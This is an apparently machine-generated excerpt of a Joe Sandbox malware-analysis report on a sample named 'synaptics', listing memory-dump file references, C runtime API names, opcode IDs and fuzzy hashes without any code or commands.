                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastbind
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2328862993-0
                                                                                                                                                                                                                                    • Opcode ID: ea96f8f97f99137ec9fcb6489f12cf6249e14afc75b86413274a096e7784ba7d
                                                                                                                                                                                                                                    • Instruction ID: 7d5165269ac7d9313f160ff381b81a1300252e689d0c4dd7eb8fb2f737adc788
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea96f8f97f99137ec9fcb6489f12cf6249e14afc75b86413274a096e7784ba7d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0BBB0B893007AF62017709C06F9B36565B41B19F048B39BB5868ED6EBE1C914B65F
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6C6C699D
                                                                                                                                                                                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 6C6C69B7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2119613100.000000006C6BB000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C6B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2119500732.000000006C6B0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2119613100.000000006C6B9000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120191970.000000006C6C9000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120191970.000000006C6CC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120191970.000000006C6D0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120675564.000000006C6D1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6b0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2442719207-0
                                                                                                                                                                                                                                    • Opcode ID: 48cf17a17d795717f5bd8617c69151fe1961af45e0cb9e9bd75028e21236a55f
                                                                                                                                                                                                                                    • Instruction ID: 2b8c962993efa5c0035af2502f74aea5275d7481906df52e6299bdcb5c188be8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48cf17a17d795717f5bd8617c69151fe1961af45e0cb9e9bd75028e21236a55f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4641D672F45215ABDB108F95CC41BBE3AB4EF427A8F118125E814D7B50C770D9458B9F
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6C583BE4
                                                                                                                                                                                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 6C583BFE
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2104846606.000000006C581000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C580000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2104613860.000000006C580000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C586000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C58D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C592000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C594000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C596000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C598000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C59A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C59C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C59E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5A8000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5AA000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5AC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5BD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5CE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5D3000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5D5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5D7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5D9000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5DB000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5DD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5DF000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5E2000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5E6000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5E8000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5EA000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5EE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5F0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5F2000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5F4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5F6000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5F8000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5FB000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5FD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5FF000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C601000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C603000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C605000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C608000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C60A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C60C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C60E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C610000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C612000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C614000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C616000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C618000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C61A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C61C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C61E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C620000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C622000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C624000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C626000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C62E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C632000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C636000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C638000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C63A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C63C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C63E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C642000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C644000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C646000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C648000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C64E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C651000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C653000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C659000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C66A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C66C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C66E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C670000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C672000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C674000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C676000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C678000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C67C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C67E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C680000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C682000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C684000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2118298410.000000006C68D000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2118398996.000000006C68E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c580000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2442719207-0
                                                                                                                                                                                                                                    • Opcode ID: a72d1be6a965a6b5454ea019d2dfb6408cdb6abc4d20fbb92695f38136f8524a
                                                                                                                                                                                                                                    • Instruction ID: 356336dc8ec10f6253a568f25a4b2ff2afa6c69fd5632d453e31ecfd744e7894
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a72d1be6a965a6b5454ea019d2dfb6408cdb6abc4d20fbb92695f38136f8524a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6141F472E07279EFDB108F59CC40BAE3AB8EF81B98F104519E81467B40D7758D058BA0
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2203187848.0000000073FC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73FC1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_73fc1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3353612457-0
                                                                                                                                                                                                                                    • Opcode ID: d6c9ee59293b03ed3fb891aea3fd46126b914995b052467a9cd8504d70f888be
                                                                                                                                                                                                                                    • Instruction ID: baf2f4db300835f0c068587e1216bb8686df90dd63159e0dd5a855383c492003
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6c9ee59293b03ed3fb891aea3fd46126b914995b052467a9cd8504d70f888be
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99217172E882ABEFDB229F55CD40B6F7AB9EF84BD0B0D4129F81657250C630CD418B90
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2119613100.000000006C6BB000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C6B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2119500732.000000006C6B0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2119613100.000000006C6B9000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120191970.000000006C6C9000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120191970.000000006C6CC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120191970.000000006C6D0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120675564.000000006C6D1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6b0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3353612457-0
                                                                                                                                                                                                                                    • Opcode ID: 6467034f64b8fd099d0b492ac4e2c6fbe625a06d5900d496183f3f8b8b122843
                                                                                                                                                                                                                                    • Instruction ID: 7eb9b8bb5d651932c8bc85d1b87c7854b08e29837639f3ea6603e2a83df3d068
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6467034f64b8fd099d0b492ac4e2c6fbe625a06d5900d496183f3f8b8b122843
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31218371F81655ABCB118E95CC409BF3A79DB81798F118125F818D7B10C731CD518BAF
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2104846606.000000006C581000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C580000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2104613860.000000006C580000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C586000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C58D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C592000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C594000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C596000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C598000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C59A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C59C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C59E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5A8000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5AA000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5AC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5BD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5CE000.00000002.00000001.01000000.00000014.sdmpDownload File
